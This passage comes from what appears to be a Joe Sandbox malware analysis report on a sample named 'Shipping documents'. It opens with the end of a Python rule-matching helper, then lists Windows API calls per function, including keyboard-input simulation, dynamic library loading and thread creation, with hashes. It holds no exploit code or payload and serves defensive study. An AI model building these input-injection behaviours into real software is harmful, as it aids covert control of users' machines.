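if __name__ == "__main__":
    for start, fh, labels in match_rules(parse_records(SAMPLE)):
        print(f"{start:08X}  {fh[:16]}...  {', '.join(labels)}")
```

Run against the full report text, the helper reports the two routines that cover a rule (the resolver at 00465559 and the registry enumerator at 0046B3A6) and skips the single RegConnectRegistryW call at 0046B799, which has no open or enumerate call of its own. Rules are sets rather than ordered sequences on purpose: the order in the listing is address order, not necessarily control-flow order, so `api_sequence` is only a hint for writing a detection, not proof of the call sequence.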
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetMenu.USER32 ref: 0047A703
• GetMenuItemCount.USER32(00000000), ref: 0047A74F
• GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
• _wcslen.LIBCMT ref: 0047A79E
• GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
• GetSubMenu.USER32(00000000,?), ref: 0047A7F2
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
• String ID:
• API String ID: 3257027151-0
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
• WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: ErrorLastselect
• String ID:
• API String ID: 215497628-0
APIs
• GetParent.USER32(?), ref: 0044443B
• GetKeyboardState.USER32(?), ref: 00444450
• SetKeyboardState.USER32(?), ref: 004444A4
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
• ImageList_Remove.COMCTL32(?,?), ref: 004553D3
• SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
• String ID:
• API String ID: 2354583917-0
APIs
• LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
• GetProcAddress.KERNEL32(?,?), ref: 004648F7
• GetProcAddress.KERNEL32(?,00000000), ref: 00464916
• GetProcAddress.KERNEL32(?,?), ref: 0046495A
• FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: #v
• API String ID: 2449869053-554117064
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                          • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                          • String ID: %lu$\VH
                                                                                                          • API String ID: 3164766367-2432546070
                                                                                                          • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                          • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                          • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                          • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: Msctls_Progress32
                                                                                                          • API String ID: 3850602802-3636473452
                                                                                                          • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                          • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                          • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                          • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                          • String ID:
                                                                                                          • API String ID: 3985565216-0
                                                                                                          • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                          • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                          • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                          • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 0041F707
                                                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                          • _free.LIBCMT ref: 0041F71A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_free_malloc
                                                                                                          • String ID: [B
                                                                                                          • API String ID: 1020059152-632041663
                                                                                                          • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                          • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                          • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                          • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                          APIs
                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                          • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                          • __getptd.LIBCMT ref: 00413DBD
                                                                                                          • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                          • _free.LIBCMT ref: 00413E07
                                                                                                          • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 155776804-0
                                                                                                          • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                          • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                          • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                          • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                          APIs
                                                                                                            • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                            • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1957940570-0
                                                                                                          • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                          • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                          • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                          • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                          APIs
                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                          • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                          • __freefls@4.LIBCMT ref: 00413D74
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                          • String ID:
                                                                                                          • API String ID: 259663610-0
                                                                                                          • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                          • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                          • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                          • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
APIs
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: _malloc_wcslen$_strcat_wcscpy
• String ID:
• API String ID: 1612042205-0
• Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
• Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
• Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
• Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: _memmove_strncmp
• String ID: >$U$\
• API String ID: 2666721431-237099441
• Opcode ID: 994491dbf5b58f6e61d1652d7d37ee4df9314aaeb5249f187bfdd15a9c44ea64
• Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
• Opcode Fuzzy Hash: 994491dbf5b58f6e61d1652d7d37ee4df9314aaeb5249f187bfdd15a9c44ea64
• Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
APIs
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
